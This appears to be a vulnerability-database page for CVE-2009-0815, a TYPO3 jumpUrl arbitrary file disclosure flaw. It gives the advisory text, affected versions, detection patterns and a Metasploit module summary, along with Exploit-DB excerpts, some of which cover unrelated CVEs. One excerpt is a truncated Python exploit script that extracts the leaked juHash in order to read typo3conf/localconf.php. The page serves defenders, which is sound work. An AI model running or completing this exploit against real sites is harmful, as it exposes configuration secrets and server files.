CVE-2009-0815
published 2009-03-05CVE-2009-0815: The jumpUrl mechanism in class.tslib_fe.php in TYPO3 3.3.x through 3.8.x, 4.0 before 4.0.12, 4.1 before 4.1.10, 4.2 before 4.2.6, and 4.3alpha1 leaks a hash…
PriorityP343medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
42.23%
98.5th percentile
The jumpUrl mechanism in class.tslib_fe.php in TYPO3 3.3.x through 3.8.x, 4.0 before 4.0.12, 4.1 before 4.1.10, 4.2 before 4.2.6, and 4.3alpha1 leaks a hash secret (juHash) in an error message, which allows remote attackers to read arbitrary files by including the hash in a request.
Affected
27 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| typo3 | cms | >= 3.3 < 4.0.12 | 4.0.12 |
| typo3 | cms | >= 4.1 < 4.1.10 | 4.1.10 |
| typo3 | cms | >= 4.2 < 4.2.6 | 4.2.6 |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
| typo3 | typo3 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for HTTP requests to /index.php containing both 'juSecure=1' and 'locationData=' parameters, which indicate exploitation of the jumpUrl file disclosure mechanism. ↗
- →Monitor HTTP responses from TYPO3 for the error string pattern 'Calculated juHash, [a-z0-9]+, did not' which leaks the secret hash value to the attacker. ↗
- →Flag requests targeting sensitive TYPO3 configuration files via the jumpUrl parameter, especially 'typo3conf/localconf.php' which contains the security key. ↗
- ·The attacker can read any file accessible to the web server user account, not just TYPO3-specific files; the default target is typo3conf/localconf.php but arbitrary paths can be supplied. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
TYPO3 leaks a hash secret in an error message
ghsa·2022-05-02
CVE-2009-0815 [MEDIUM] CWE-200 TYPO3 leaks a hash secret in an error message
TYPO3 leaks a hash secret in an error message
The jumpUrl mechanism in class.tslib_fe.php in TYPO3 3.3.x through 3.8.x, 4.0 before 4.0.12, 4.1 before 4.1.10, 4.2 before 4.2.6, and 4.3alpha1 leaks a hash secret (juHash) in an error message, which allows remote attackers to read arbitrary files by including the hash in a request.
OSV
TYPO3 leaks a hash secret in an error message
osv·2022-05-02
CVE-2009-0815 [MEDIUM] TYPO3 leaks a hash secret in an error message
TYPO3 leaks a hash secret in an error message
The jumpUrl mechanism in class.tslib_fe.php in TYPO3 3.3.x through 3.8.x, 4.0 before 4.0.12, 4.1 before 4.1.10, 4.2 before 4.2.6, and 4.3alpha1 leaks a hash secret (juHash) in an error message, which allows remote attackers to read arbitrary files by including the hash in a request.
No detection rules found.
Exploit-DB
Multiple Vendor - PF Null Pointer Dereference
exploitdb·2009-04-30
CVE-2009-0687 Multiple Vendor - PF Null Pointer Dereference
Multiple Vendor - PF Null Pointer Dereference
---
_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
Author : Rembrandt
Date : 2009-04-30
Found : 2009-04-09
Affected Software: PF (OpenBSD Packet Filter)
Affected OS : OpenBSD 4.2 up to 4.5 and HEAD branch up to 2009-04-11
NetBSD 5.x up to RC3 and HEAD branch up to 2009-04-13
MirOS #10 and earlier
MidnightBSD 0.3-current
Not affected OS : FreeBSD
NetBSD 3.x, 4.x, 5.x (patched before release)
DragonflyBSD
Debian GNU/kFreeBSD
MidnightBSD prior 0.3
Older versions of OpenBSD PF and products based
thereon might be affected as well.
The Bug was introduced between the OpenBSD 4.1 and 4.2
release.
Type : Denial of Service
O
Exploit-DB
OpenBSD 4.5 - IP datagrams Remote Denial of Service
exploitdb·2009-04-13
CVE-2009-0687 OpenBSD 4.5 - IP datagrams Remote Denial of Service
OpenBSD 4.5 - IP datagrams Remote Denial of Service
---
_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
Author : Rembrandt
Date : 2009-04-09
Affected Software: OpenBSD Kernel
Affected OS : OpenBSD 4.{3,4,5}, OpenBSD-current
Propably older versions are affected as well
Type : Denial of Service
OSVDB :
Milw0rm :
CVE :
ISS X-Force: :
BID :
Secunia : 34676
VUPEN ID :
Trying to fix it responsible and get in contact with the vendor:
-- OpenBSD --
Contacted 2009-04-09 15:35 GMT+1
Patch avaiable 2009-04-11 23:43 UTC
We received no response nor a notification about an upcoming patch by
the developers.
-- END --
OpenBSDs PF firewall in OpenBSD 4.3 up to OpenBSD-current
Exploit-DB
Gigaset SE461 WiMAX Router - Remote Denial of Service
exploitdb·2009-03-23
CVE-2009-1152 Gigaset SE461 WiMAX Router - Remote Denial of Service
Gigaset SE461 WiMAX Router - Remote Denial of Service
---
_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
Author : Benkei
Date : 2008-02-08
Vendor : Siemens
Affected product : Gigaset SE461 WiMAX router
Firmware version : 1.5-BL024.9.6401
Propably other firmware versions are affected as well
Type : Denial of Service
OSVDB :
Milw0rm :
CVE :
ISS X-Force: :
After establishing a tcp connection to the affected device on port 53 from the
LAN interface and after closing the connection the router will restart.
Sometimes when using the web trigger with Internet explorer the WAN
configuration (ip, gateway ip, dns servers) for the device was lost and a
hardware reset was
Exploit-DB
TYPO3 < 4.0.12/4.1.10/4.2.6 - 'jumpUrl' Remote File Disclosure
exploitdb·2009-02-10
CVE-2009-0815 TYPO3 < 4.0.12/4.1.10/4.2.6 - 'jumpUrl' Remote File Disclosure
TYPO3
# date: 2009/02/10
# vendor url: http://typo3.org
# vulnerable versions: TYPO3 (defaults to typo3conf/localconf.php)
#
# if people fixed their installations but did not update the typo3 security key
# you should be able to precompute the hashes if you previously got the security key.
#
# greetings to milw0rm, roflek
import urllib,re,sys
strip = re.compile(r'.*Calculated juHash, ([a-z0-9]+), did not.*')
def useme():
print sys.argv[0], ' (with http://) (defaults to typo3conf/localconf.php)'
sys.exit(0)
def parsehash(host, f):
file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:'})
url = host + '/index.php?' + file
try:
s = urllib.urlopen(url)
r = s.read()
except Exception, e:
print '[!] - ', str(e)
return None
tmp = strip.match(r)
if tmp:
return
Exploit-DB
Netgear SSL312 Router - Denial of Service
exploitdb·2009-02-09
CVE-2009-0680 Netgear SSL312 Router - Denial of Service
Netgear SSL312 Router - Denial of Service
---
_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
Author : Rembrandt
Date : 2008-02-27
Affected Software: propietary CGI
Affected OS : Netgear embedded Linux for the SSL312 router
Propably other devices are affected as well
Type : Denial of Service
OSVDB :
Milw0rm : 8008
CVE :
ISS X-Force: :
BID : 33675
Trying to fix it responsible and get in contact with the vendor:
-- ZDI --
Case Opened 2008-12-28 07:57 GMT-6
Case Closed 2009-01-15 17:01 GMT-6
"After some deliberation we have unfortunately decided that we won't be
accepting bugs affecting NetGear products."
-- END --
Contacting Netgear and mitre.org: 2009-02-01 1
Metasploit
Typo3 sa-2009-002 File Disclosure
metasploit
Typo3 sa-2009-002 File Disclosure
Typo3 sa-2009-002 File Disclosure
This module exploits a file disclosure vulnerability in the jumpUrl mechanism of Typo3. This flaw can be used to read any file that the web server user account has access to.
No writeups or analysis indexed.
http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/http://www.debian.org/security/2009/dsa-1720http://www.openwall.com/lists/oss-security/2009/02/10/6http://www.securitytracker.com/id?1021710http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/http://www.debian.org/security/2009/dsa-1720http://www.openwall.com/lists/oss-security/2009/02/10/6http://www.securitytracker.com/id?1021710
2009-03-05
Published